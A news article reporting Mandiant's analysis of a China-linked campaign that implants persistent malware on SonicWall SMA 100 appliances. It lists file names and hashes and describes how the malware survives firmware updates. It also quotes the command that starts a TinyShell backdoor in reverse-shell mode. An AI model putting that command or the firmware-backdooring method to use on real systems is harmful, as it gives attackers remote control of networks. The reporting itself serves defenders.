Threat actors with a connection to the Chinese government are infecting a widely used security appliance from SonicWall with malware that remains active even after the device receives firmware updates, researchers said.
SonicWall’s Secure Mobile Access 100 is a secure remote access appliance that helps organizations securely deploy remote workforces. Customers use it to grant granular access controls to remote users, provide VPN connections to organization networks, and set unique profiles for each employee. The access the SMA 100 has to customer networks makes it an attractive target for threat actors.
In 2021, the device came under attack by sophisticated hackers who exploited what was then a zero-day vulnerability. Security appliances from Fortinet and Pulse Secure have come under similar attacks in recent years.
Gaining long-term persistence inside networks
On Thursday, security firm Mandiant published a report that said threat actors with a suspected nexus to China were engaged in a campaign to maintain long-term persistence by running malware on unpatched SonicWall SMA appliances. The campaign was notable for the ability of the malware to remain on the devices even after its firmware received new firmware.
“The attackers put significant effort into the stability and persistence of their tooling,” Mandiant researchers Daniel Lee, Stephen Eckels, and Ben Read wrote. “This allows their access to the network to persist through firmware updates and maintain a foothold on the network through the SonicWall Device.”
To achieve this persistence, the malware checks for available firmware upgrades every 10 seconds. When an update becomes available, the malware copies the archived file for backup, unzips it, mounts it, and then copies the entire package of malicious files to it. The malware also adds a backdoor root user to the mounted file. Then, the malware rezips the file so it’s ready for installation.
“The technique is not especially sophisticated, but it does show considerable effort on the part of the attacker to understand the appliance update cycle, then develop and test a method for persistence,” the researchers wrote.
The persistence techniques are consistent with an attack campaign in 2021 that used 16 malware families to infect Pulse Secure devices. Mandiant attributed the attacks to multiple threat groups, including those tracked as UNC2630, UNC2717, which the company said support “key Chinese government priorities.” Mandiant attributed the ongoing attacks against SonicWall SMA 100 customers to a group tracked as UNC4540.
“In recent years Chinese attackers have deployed multiple zero-day exploits and malware for a variety of Internet-facing network appliances as a route to full enterprise intrusion, and the instance reported here is part of a recent pattern that Mandiant expects to continue in the near term,” Mandiant researchers wrote in Thursday’s report.
Highly privileged access
The main purpose of the malware appears to be stealing cryptographically hashed passwords for all logged-in users. It also provides a web shell the threat actor can use to install new malware.
“Analysis of a compromised device revealed a collection of files that give the attacker a highly privileged and available access to the appliance,” the researchers wrote in Thursday’s report. “The malware consists of a series of bash scripts and a single ELF binary identified as a TinyShell variant. The overall behavior of the suite of malicious bash scripts shows a detailed understanding of the appliance and is well-tailored to the system to provide stability and persistence.”
The list of malware is:
|/bin/firewalld||e4117b17e3d14fe64f45750be71dbaa6||Main malware process|
|/etc/rc.d/rc.local||559b9ae2a578e1258e80c45a5794c071||Boot persistence for firewalld|
|/bin/iptabled||8dbf1effa7bc94fc0b9b4ce83dfce2e6||Redundant main malware process|
|/bin/geoBotnetd||619769d3d40a3c28ec83832ca521f521||Firmware backdoor script|
|/bin/ifconfig6||fa1bf2e427b2defffd573854c35d4919||Graceful shutdown script|
The report continued:
The main malware entry point is a bash script named
firewalld, which executes its primary loop once for a count of every file on the system squared: …
for j in $(ls / -R) do for i in $(ls / -R) do:… The script is responsible for executing an SQL command to accomplish credential stealing and execution of the other components.
The first function in
firewalldexecutes the TinyShell backdoor
nohup /bin/httpsd -c -d 5 -m -1 -p 51432 > /dev/null 2>&1 &if the
httpsdprocess isn’t already running. This sets TinyShell to reverse-shell mode, instructing it to call out to the aforementioned IP address and port at a specific time and day represented by the
-mflag, with a beacon interval defined by the
-dflag. The binary embeds a hard coded IP address, which is used in reverse-shell mode if the IP address argument is left blank. It also has a listening bind shell mode available.
The researchers said they didn’t know what the initial infection vector was.
Last week, SonicWall published an advisory that urged SMA 100 users to upgrade to version 10.2.1.7 or higher. Those versions include enhancements such as File Integrity Monitoring and anomalous process identification. The patch is available here. Users should also regularly review logs for signs of compromise, including abnormal logins or internal traffic.